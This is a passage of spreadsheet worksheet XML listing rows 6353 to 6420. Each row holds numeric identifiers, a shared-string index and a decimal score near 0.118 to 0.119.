      </c>
      <c r="D6353" s="2">
        <v>1.0</v>
      </c>
      <c r="E6353" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6353" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6354" ht="15.75" customHeight="1">
      <c r="A6354" s="1">
        <v>25176.0</v>
      </c>
      <c r="B6354" s="2">
        <v>1.3118116E7</v>
      </c>
      <c r="C6354" s="2" t="s">
        <v>6049</v>
      </c>
      <c r="D6354" s="2">
        <v>1.0</v>
      </c>
      <c r="E6354" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6354" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6355" ht="15.75" customHeight="1">
      <c r="A6355" s="1">
        <v>25181.0</v>
      </c>
      <c r="B6355" s="2">
        <v>1.312275E7</v>
      </c>
      <c r="C6355" s="2" t="s">
        <v>6050</v>
      </c>
      <c r="D6355" s="2">
        <v>1.0</v>
      </c>
      <c r="E6355" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6355" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6356" ht="15.75" customHeight="1">
      <c r="A6356" s="1">
        <v>26348.0</v>
      </c>
      <c r="B6356" s="2">
        <v>1.6797108E7</v>
      </c>
      <c r="C6356" s="2" t="s">
        <v>6002</v>
      </c>
      <c r="D6356" s="2">
        <v>1.0</v>
      </c>
      <c r="E6356" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6356" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6357" ht="15.75" customHeight="1">
      <c r="A6357" s="1">
        <v>27927.0</v>
      </c>
      <c r="B6357" s="2">
        <v>2.3782242E7</v>
      </c>
      <c r="C6357" s="2" t="s">
        <v>6051</v>
      </c>
      <c r="D6357" s="2">
        <v>1.0</v>
      </c>
      <c r="E6357" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6357" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6358" ht="15.75" customHeight="1">
      <c r="A6358" s="1">
        <v>28119.0</v>
      </c>
      <c r="B6358" s="2">
        <v>2.4705152E7</v>
      </c>
      <c r="C6358" s="2" t="s">
        <v>6052</v>
      </c>
      <c r="D6358" s="2">
        <v>1.0</v>
      </c>
      <c r="E6358" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6358" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6359" ht="15.75" customHeight="1">
      <c r="A6359" s="1">
        <v>28892.0</v>
      </c>
      <c r="B6359" s="2">
        <v>2.9275661E7</v>
      </c>
      <c r="C6359" s="2" t="s">
        <v>6053</v>
      </c>
      <c r="D6359" s="2">
        <v>1.0</v>
      </c>
      <c r="E6359" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6359" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6360" ht="15.75" customHeight="1">
      <c r="A6360" s="1">
        <v>29900.0</v>
      </c>
      <c r="B6360" s="2">
        <v>3607034.0</v>
      </c>
      <c r="C6360" s="2" t="s">
        <v>6054</v>
      </c>
      <c r="D6360" s="2">
        <v>1.0</v>
      </c>
      <c r="E6360" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6360" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6361" ht="15.75" customHeight="1">
      <c r="A6361" s="1">
        <v>31039.0</v>
      </c>
      <c r="B6361" s="2">
        <v>4.7846128E7</v>
      </c>
      <c r="C6361" s="2" t="s">
        <v>6055</v>
      </c>
      <c r="D6361" s="2">
        <v>1.0</v>
      </c>
      <c r="E6361" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6361" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6362" ht="15.75" customHeight="1">
      <c r="A6362" s="1">
        <v>31047.0</v>
      </c>
      <c r="B6362" s="2">
        <v>4.7926766E7</v>
      </c>
      <c r="C6362" s="2" t="s">
        <v>6056</v>
      </c>
      <c r="D6362" s="2">
        <v>1.0</v>
      </c>
      <c r="E6362" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6362" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6363" ht="15.75" customHeight="1">
      <c r="A6363" s="1">
        <v>31121.0</v>
      </c>
      <c r="B6363" s="2">
        <v>4883903.0</v>
      </c>
      <c r="C6363" s="2" t="s">
        <v>6057</v>
      </c>
      <c r="D6363" s="2">
        <v>1.0</v>
      </c>
      <c r="E6363" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6363" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6364" ht="15.75" customHeight="1">
      <c r="A6364" s="1">
        <v>21.0</v>
      </c>
      <c r="B6364" s="2">
        <v>1.0472514E7</v>
      </c>
      <c r="C6364" s="2" t="s">
        <v>6058</v>
      </c>
      <c r="D6364" s="2">
        <v>1.0</v>
      </c>
      <c r="E6364" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6364" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6365" ht="15.75" customHeight="1">
      <c r="A6365" s="1">
        <v>3831.0</v>
      </c>
      <c r="B6365" s="2">
        <v>4.0177347E7</v>
      </c>
      <c r="C6365" s="2" t="s">
        <v>6059</v>
      </c>
      <c r="D6365" s="2">
        <v>1.0</v>
      </c>
      <c r="E6365" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6365" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6366" ht="15.75" customHeight="1">
      <c r="A6366" s="1">
        <v>14875.0</v>
      </c>
      <c r="B6366" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C6366" s="2" t="s">
        <v>6060</v>
      </c>
      <c r="D6366" s="2">
        <v>1.0</v>
      </c>
      <c r="E6366" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6366" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6367" ht="15.75" customHeight="1">
      <c r="A6367" s="1">
        <v>20192.0</v>
      </c>
      <c r="B6367" s="2">
        <v>1.052239E7</v>
      </c>
      <c r="C6367" s="2" t="s">
        <v>6061</v>
      </c>
      <c r="D6367" s="2">
        <v>1.0</v>
      </c>
      <c r="E6367" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6367" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6368" ht="15.75" customHeight="1">
      <c r="A6368" s="1">
        <v>20681.0</v>
      </c>
      <c r="B6368" s="2">
        <v>1.4443043E7</v>
      </c>
      <c r="C6368" s="2" t="s">
        <v>6062</v>
      </c>
      <c r="D6368" s="2">
        <v>1.0</v>
      </c>
      <c r="E6368" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6368" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6369" ht="15.75" customHeight="1">
      <c r="A6369" s="1">
        <v>20767.0</v>
      </c>
      <c r="B6369" s="2">
        <v>1.4958626E7</v>
      </c>
      <c r="C6369" s="2" t="s">
        <v>6063</v>
      </c>
      <c r="D6369" s="2">
        <v>1.0</v>
      </c>
      <c r="E6369" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6369" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6370" ht="15.75" customHeight="1">
      <c r="A6370" s="1">
        <v>27416.0</v>
      </c>
      <c r="B6370" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C6370" s="2" t="s">
        <v>6064</v>
      </c>
      <c r="D6370" s="2">
        <v>1.0</v>
      </c>
      <c r="E6370" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6370" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6371" ht="15.75" customHeight="1">
      <c r="A6371" s="1">
        <v>28287.0</v>
      </c>
      <c r="B6371" s="2">
        <v>2.5523601E7</v>
      </c>
      <c r="C6371" s="2" t="s">
        <v>6065</v>
      </c>
      <c r="D6371" s="2">
        <v>1.0</v>
      </c>
      <c r="E6371" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6371" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6372" ht="15.75" customHeight="1">
      <c r="A6372" s="1">
        <v>29389.0</v>
      </c>
      <c r="B6372" s="2">
        <v>3.1878332E7</v>
      </c>
      <c r="C6372" s="2" t="s">
        <v>6066</v>
      </c>
      <c r="D6372" s="2">
        <v>1.0</v>
      </c>
      <c r="E6372" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6372" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6373" ht="15.75" customHeight="1">
      <c r="A6373" s="1">
        <v>30974.0</v>
      </c>
      <c r="B6373" s="2">
        <v>4.7493569E7</v>
      </c>
      <c r="C6373" s="2" t="s">
        <v>6067</v>
      </c>
      <c r="D6373" s="2">
        <v>1.0</v>
      </c>
      <c r="E6373" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6373" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6374" ht="15.75" customHeight="1">
      <c r="A6374" s="1">
        <v>33594.0</v>
      </c>
      <c r="B6374" s="2">
        <v>8331584.0</v>
      </c>
      <c r="C6374" s="2" t="s">
        <v>6068</v>
      </c>
      <c r="D6374" s="2">
        <v>1.0</v>
      </c>
      <c r="E6374" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6374" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="6375" ht="15.75" customHeight="1">
      <c r="A6375" s="1">
        <v>20208.0</v>
      </c>
      <c r="B6375" s="2">
        <v>1.0666103E7</v>
      </c>
      <c r="C6375" s="2" t="s">
        <v>6069</v>
      </c>
      <c r="D6375" s="2">
        <v>1.0</v>
      </c>
      <c r="E6375" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6375" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="6376" ht="15.75" customHeight="1">
      <c r="A6376" s="1">
        <v>21020.0</v>
      </c>
      <c r="B6376" s="2">
        <v>1.7404223E7</v>
      </c>
      <c r="C6376" s="2" t="s">
        <v>6070</v>
      </c>
      <c r="D6376" s="2">
        <v>1.0</v>
      </c>
      <c r="E6376" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6376" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="6377" ht="15.75" customHeight="1">
      <c r="A6377" s="1">
        <v>24550.0</v>
      </c>
      <c r="B6377" s="2">
        <v>1.1273848E7</v>
      </c>
      <c r="C6377" s="2" t="s">
        <v>6071</v>
      </c>
      <c r="D6377" s="2">
        <v>1.0</v>
      </c>
      <c r="E6377" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6377" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="6378" ht="15.75" customHeight="1">
      <c r="A6378" s="1">
        <v>21968.0</v>
      </c>
      <c r="B6378" s="2">
        <v>2.9105345E7</v>
      </c>
      <c r="C6378" s="2" t="s">
        <v>6072</v>
      </c>
      <c r="D6378" s="2">
        <v>1.0</v>
      </c>
      <c r="E6378" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6378" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="6379" ht="15.75" customHeight="1">
      <c r="A6379" s="1">
        <v>22831.0</v>
      </c>
      <c r="B6379" s="2">
        <v>4.6442273E7</v>
      </c>
      <c r="C6379" s="2" t="s">
        <v>6073</v>
      </c>
      <c r="D6379" s="2">
        <v>1.0</v>
      </c>
      <c r="E6379" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6379" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="6380" ht="15.75" customHeight="1">
      <c r="A6380" s="1">
        <v>27226.0</v>
      </c>
      <c r="B6380" s="2">
        <v>2.1004809E7</v>
      </c>
      <c r="C6380" s="2" t="s">
        <v>6074</v>
      </c>
      <c r="D6380" s="2">
        <v>1.0</v>
      </c>
      <c r="E6380" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6380" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="6381" ht="15.75" customHeight="1">
      <c r="A6381" s="1">
        <v>29937.0</v>
      </c>
      <c r="B6381" s="2">
        <v>3607476.0</v>
      </c>
      <c r="C6381" s="2" t="s">
        <v>6075</v>
      </c>
      <c r="D6381" s="2">
        <v>1.0</v>
      </c>
      <c r="E6381" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6381" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="6382" ht="15.75" customHeight="1">
      <c r="A6382" s="1">
        <v>24129.0</v>
      </c>
      <c r="B6382" s="2">
        <v>1.0029421E7</v>
      </c>
      <c r="C6382" s="2" t="s">
        <v>6076</v>
      </c>
      <c r="D6382" s="2">
        <v>1.0</v>
      </c>
      <c r="E6382" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6382" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="6383" ht="15.75" customHeight="1">
      <c r="A6383" s="1">
        <v>24665.0</v>
      </c>
      <c r="B6383" s="2">
        <v>1.1541643E7</v>
      </c>
      <c r="C6383" s="2" t="s">
        <v>6077</v>
      </c>
      <c r="D6383" s="2">
        <v>1.0</v>
      </c>
      <c r="E6383" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6383" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="6384" ht="15.75" customHeight="1">
      <c r="A6384" s="1">
        <v>33511.0</v>
      </c>
      <c r="B6384" s="2">
        <v>8080346.0</v>
      </c>
      <c r="C6384" s="2" t="s">
        <v>6078</v>
      </c>
      <c r="D6384" s="2">
        <v>1.0</v>
      </c>
      <c r="E6384" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6384" s="2">
        <v>0.1188034188034188</v>
      </c>
    </row>
    <row r="6385" ht="15.75" customHeight="1">
      <c r="A6385" s="1">
        <v>30864.0</v>
      </c>
      <c r="B6385" s="2">
        <v>4.620789E7</v>
      </c>
      <c r="C6385" s="2" t="s">
        <v>6079</v>
      </c>
      <c r="D6385" s="2">
        <v>1.0</v>
      </c>
      <c r="E6385" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6385" s="2">
        <v>0.1186868686868687</v>
      </c>
    </row>
    <row r="6386" ht="15.75" customHeight="1">
      <c r="A6386" s="1">
        <v>3957.0</v>
      </c>
      <c r="B6386" s="2">
        <v>4.0697348E7</v>
      </c>
      <c r="C6386" s="2" t="s">
        <v>6080</v>
      </c>
      <c r="D6386" s="2">
        <v>1.0</v>
      </c>
      <c r="E6386" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6386" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6387" ht="15.75" customHeight="1">
      <c r="A6387" s="1">
        <v>12841.0</v>
      </c>
      <c r="B6387" s="2">
        <v>3.1762028E7</v>
      </c>
      <c r="C6387" s="2" t="s">
        <v>6081</v>
      </c>
      <c r="D6387" s="2">
        <v>1.0</v>
      </c>
      <c r="E6387" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6387" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6388" ht="15.75" customHeight="1">
      <c r="A6388" s="1">
        <v>19967.0</v>
      </c>
      <c r="B6388" s="2">
        <v>5.7556574E7</v>
      </c>
      <c r="C6388" s="2" t="s">
        <v>6082</v>
      </c>
      <c r="D6388" s="2">
        <v>1.0</v>
      </c>
      <c r="E6388" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6388" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6389" ht="15.75" customHeight="1">
      <c r="A6389" s="1">
        <v>22121.0</v>
      </c>
      <c r="B6389" s="2">
        <v>3.0994328E7</v>
      </c>
      <c r="C6389" s="2" t="s">
        <v>6083</v>
      </c>
      <c r="D6389" s="2">
        <v>1.0</v>
      </c>
      <c r="E6389" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6389" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6390" ht="15.75" customHeight="1">
      <c r="A6390" s="1">
        <v>22144.0</v>
      </c>
      <c r="B6390" s="2">
        <v>3.1201295E7</v>
      </c>
      <c r="C6390" s="2" t="s">
        <v>6084</v>
      </c>
      <c r="D6390" s="2">
        <v>1.0</v>
      </c>
      <c r="E6390" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6390" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6391" ht="15.75" customHeight="1">
      <c r="A6391" s="1">
        <v>22282.0</v>
      </c>
      <c r="B6391" s="2">
        <v>3.3326148E7</v>
      </c>
      <c r="C6391" s="2" t="s">
        <v>6085</v>
      </c>
      <c r="D6391" s="2">
        <v>1.0</v>
      </c>
      <c r="E6391" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6391" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6392" ht="15.75" customHeight="1">
      <c r="A6392" s="1">
        <v>23732.0</v>
      </c>
      <c r="B6392" s="2">
        <v>7276228.0</v>
      </c>
      <c r="C6392" s="2" t="s">
        <v>6086</v>
      </c>
      <c r="D6392" s="2">
        <v>1.0</v>
      </c>
      <c r="E6392" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6392" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6393" ht="15.75" customHeight="1">
      <c r="A6393" s="1">
        <v>24273.0</v>
      </c>
      <c r="B6393" s="2">
        <v>1.0530411E7</v>
      </c>
      <c r="C6393" s="2" t="s">
        <v>6087</v>
      </c>
      <c r="D6393" s="2">
        <v>1.0</v>
      </c>
      <c r="E6393" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6393" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6394" ht="15.75" customHeight="1">
      <c r="A6394" s="1">
        <v>25576.0</v>
      </c>
      <c r="B6394" s="2">
        <v>1.4333253E7</v>
      </c>
      <c r="C6394" s="2" t="s">
        <v>6088</v>
      </c>
      <c r="D6394" s="2">
        <v>1.0</v>
      </c>
      <c r="E6394" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6394" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6395" ht="15.75" customHeight="1">
      <c r="A6395" s="1">
        <v>25908.0</v>
      </c>
      <c r="B6395" s="2">
        <v>1.506872E7</v>
      </c>
      <c r="C6395" s="2" t="s">
        <v>6089</v>
      </c>
      <c r="D6395" s="2">
        <v>1.0</v>
      </c>
      <c r="E6395" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6395" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6396" ht="15.75" customHeight="1">
      <c r="A6396" s="1">
        <v>26732.0</v>
      </c>
      <c r="B6396" s="2">
        <v>1.8274131E7</v>
      </c>
      <c r="C6396" s="2" t="s">
        <v>6090</v>
      </c>
      <c r="D6396" s="2">
        <v>1.0</v>
      </c>
      <c r="E6396" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6396" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6397" ht="15.75" customHeight="1">
      <c r="A6397" s="1">
        <v>29974.0</v>
      </c>
      <c r="B6397" s="2">
        <v>3609619.0</v>
      </c>
      <c r="C6397" s="2" t="s">
        <v>6091</v>
      </c>
      <c r="D6397" s="2">
        <v>1.0</v>
      </c>
      <c r="E6397" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6397" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6398" ht="15.75" customHeight="1">
      <c r="A6398" s="1">
        <v>30322.0</v>
      </c>
      <c r="B6398" s="2">
        <v>3.8053799E7</v>
      </c>
      <c r="C6398" s="2" t="s">
        <v>6092</v>
      </c>
      <c r="D6398" s="2">
        <v>1.0</v>
      </c>
      <c r="E6398" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6398" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6399" ht="15.75" customHeight="1">
      <c r="A6399" s="1">
        <v>30923.0</v>
      </c>
      <c r="B6399" s="2">
        <v>4.6958798E7</v>
      </c>
      <c r="C6399" s="2" t="s">
        <v>6093</v>
      </c>
      <c r="D6399" s="2">
        <v>1.0</v>
      </c>
      <c r="E6399" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6399" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6400" ht="15.75" customHeight="1">
      <c r="A6400" s="1">
        <v>30960.0</v>
      </c>
      <c r="B6400" s="2">
        <v>4742843.0</v>
      </c>
      <c r="C6400" s="2" t="s">
        <v>6094</v>
      </c>
      <c r="D6400" s="2">
        <v>1.0</v>
      </c>
      <c r="E6400" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6400" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6401" ht="15.75" customHeight="1">
      <c r="A6401" s="1">
        <v>32330.0</v>
      </c>
      <c r="B6401" s="2">
        <v>5.579482E7</v>
      </c>
      <c r="C6401" s="2" t="s">
        <v>6095</v>
      </c>
      <c r="D6401" s="2">
        <v>1.0</v>
      </c>
      <c r="E6401" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6401" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6402" ht="15.75" customHeight="1">
      <c r="A6402" s="1">
        <v>33935.0</v>
      </c>
      <c r="B6402" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C6402" s="2" t="s">
        <v>6096</v>
      </c>
      <c r="D6402" s="2">
        <v>1.0</v>
      </c>
      <c r="E6402" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6402" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="6403" ht="15.75" customHeight="1">
      <c r="A6403" s="1">
        <v>8127.0</v>
      </c>
      <c r="B6403" s="2">
        <v>5.3090156E7</v>
      </c>
      <c r="C6403" s="2" t="s">
        <v>6097</v>
      </c>
      <c r="D6403" s="2">
        <v>1.0</v>
      </c>
      <c r="E6403" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6403" s="2">
        <v>0.1185737976782753</v>
      </c>
    </row>
    <row r="6404" ht="15.75" customHeight="1">
      <c r="A6404" s="1">
        <v>30794.0</v>
      </c>
      <c r="B6404" s="2">
        <v>4500818.0</v>
      </c>
      <c r="C6404" s="2" t="s">
        <v>6098</v>
      </c>
      <c r="D6404" s="2">
        <v>1.0</v>
      </c>
      <c r="E6404" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6404" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="6405" ht="15.75" customHeight="1">
      <c r="A6405" s="1">
        <v>29589.0</v>
      </c>
      <c r="B6405" s="2">
        <v>3.3519882E7</v>
      </c>
      <c r="C6405" s="2" t="s">
        <v>6099</v>
      </c>
      <c r="D6405" s="2">
        <v>1.0</v>
      </c>
      <c r="E6405" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6405" s="2">
        <v>0.1183574879227054</v>
      </c>
    </row>
    <row r="6406" ht="15.75" customHeight="1">
      <c r="A6406" s="1">
        <v>31527.0</v>
      </c>
      <c r="B6406" s="2">
        <v>5.0894621E7</v>
      </c>
      <c r="C6406" s="2" t="s">
        <v>6100</v>
      </c>
      <c r="D6406" s="2">
        <v>1.0</v>
      </c>
      <c r="E6406" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6406" s="2">
        <v>0.1183574879227054</v>
      </c>
    </row>
    <row r="6407" ht="15.75" customHeight="1">
      <c r="A6407" s="1">
        <v>24174.0</v>
      </c>
      <c r="B6407" s="2">
        <v>1.0203091E7</v>
      </c>
      <c r="C6407" s="2" t="s">
        <v>6101</v>
      </c>
      <c r="D6407" s="2">
        <v>1.0</v>
      </c>
      <c r="E6407" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6407" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="6408" ht="15.75" customHeight="1">
      <c r="A6408" s="1">
        <v>25241.0</v>
      </c>
      <c r="B6408" s="2">
        <v>1.3380153E7</v>
      </c>
      <c r="C6408" s="2" t="s">
        <v>6102</v>
      </c>
      <c r="D6408" s="2">
        <v>1.0</v>
      </c>
      <c r="E6408" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6408" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="6409" ht="15.75" customHeight="1">
      <c r="A6409" s="1">
        <v>33353.0</v>
      </c>
      <c r="B6409" s="2">
        <v>7615453.0</v>
      </c>
      <c r="C6409" s="2" t="s">
        <v>6103</v>
      </c>
      <c r="D6409" s="2">
        <v>1.0</v>
      </c>
      <c r="E6409" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6409" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="6410" ht="15.75" customHeight="1">
      <c r="A6410" s="1">
        <v>32395.0</v>
      </c>
      <c r="B6410" s="2">
        <v>5625774.0</v>
      </c>
      <c r="C6410" s="2" t="s">
        <v>6104</v>
      </c>
      <c r="D6410" s="2">
        <v>1.0</v>
      </c>
      <c r="E6410" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6410" s="2">
        <v>0.1181533646322379</v>
      </c>
    </row>
    <row r="6411" ht="15.75" customHeight="1">
      <c r="A6411" s="1">
        <v>21496.0</v>
      </c>
      <c r="B6411" s="2">
        <v>2.3082225E7</v>
      </c>
      <c r="C6411" s="2" t="s">
        <v>6105</v>
      </c>
      <c r="D6411" s="2">
        <v>1.0</v>
      </c>
      <c r="E6411" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6411" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="6412" ht="15.75" customHeight="1">
      <c r="A6412" s="1">
        <v>22977.0</v>
      </c>
      <c r="B6412" s="2">
        <v>4926695.0</v>
      </c>
      <c r="C6412" s="2" t="s">
        <v>6106</v>
      </c>
      <c r="D6412" s="2">
        <v>1.0</v>
      </c>
      <c r="E6412" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6412" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="6413" ht="15.75" customHeight="1">
      <c r="A6413" s="1">
        <v>23264.0</v>
      </c>
      <c r="B6413" s="2">
        <v>5325473.0</v>
      </c>
      <c r="C6413" s="2" t="s">
        <v>6107</v>
      </c>
      <c r="D6413" s="2">
        <v>1.0</v>
      </c>
      <c r="E6413" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6413" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="6414" ht="15.75" customHeight="1">
      <c r="A6414" s="1">
        <v>28514.0</v>
      </c>
      <c r="B6414" s="2">
        <v>2.6749857E7</v>
      </c>
      <c r="C6414" s="2" t="s">
        <v>6108</v>
      </c>
      <c r="D6414" s="2">
        <v>1.0</v>
      </c>
      <c r="E6414" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6414" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="6415" ht="15.75" customHeight="1">
      <c r="A6415" s="1">
        <v>30045.0</v>
      </c>
      <c r="B6415" s="2">
        <v>3623629.0</v>
      </c>
      <c r="C6415" s="2" t="s">
        <v>6109</v>
      </c>
      <c r="D6415" s="2">
        <v>1.0</v>
      </c>
      <c r="E6415" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6415" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="6416" ht="15.75" customHeight="1">
      <c r="A6416" s="1">
        <v>32720.0</v>
      </c>
      <c r="B6416" s="2">
        <v>5981009.0</v>
      </c>
      <c r="C6416" s="2" t="s">
        <v>6110</v>
      </c>
      <c r="D6416" s="2">
        <v>1.0</v>
      </c>
      <c r="E6416" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6416" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="6417" ht="15.75" customHeight="1">
      <c r="A6417" s="1">
        <v>30135.0</v>
      </c>
      <c r="B6417" s="2">
        <v>3.703616E7</v>
      </c>
      <c r="C6417" s="2" t="s">
        <v>6111</v>
      </c>
      <c r="D6417" s="2">
        <v>1.0</v>
      </c>
      <c r="E6417" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6417" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="6418" ht="15.75" customHeight="1">
      <c r="A6418" s="1">
        <v>20182.0</v>
      </c>
      <c r="B6418" s="2">
        <v>1.0464875E7</v>
      </c>
      <c r="C6418" s="2" t="s">
        <v>6112</v>
      </c>
      <c r="D6418" s="2">
        <v>1.0</v>
      </c>
      <c r="E6418" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6418" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="6419" ht="15.75" customHeight="1">
      <c r="A6419" s="1">
        <v>21118.0</v>
      </c>
      <c r="B6419" s="2">
        <v>1.8274132E7</v>
      </c>
      <c r="C6419" s="2" t="s">
        <v>6113</v>
      </c>
      <c r="D6419" s="2">
        <v>1.0</v>
      </c>
      <c r="E6419" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6419" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="6420" ht="15.75" customHeight="1">
      <c r="A6420" s="1">
        <v>23895.0</v>
      </c>
      <c r="B6420" s="2">
        <v>8445055.0</v>
      </c>
      <c r="C6420" s="2" t="s">
        <v>6114</v>
      </c>
      <c r="D6420" s="2">
        <v>1.0</v>
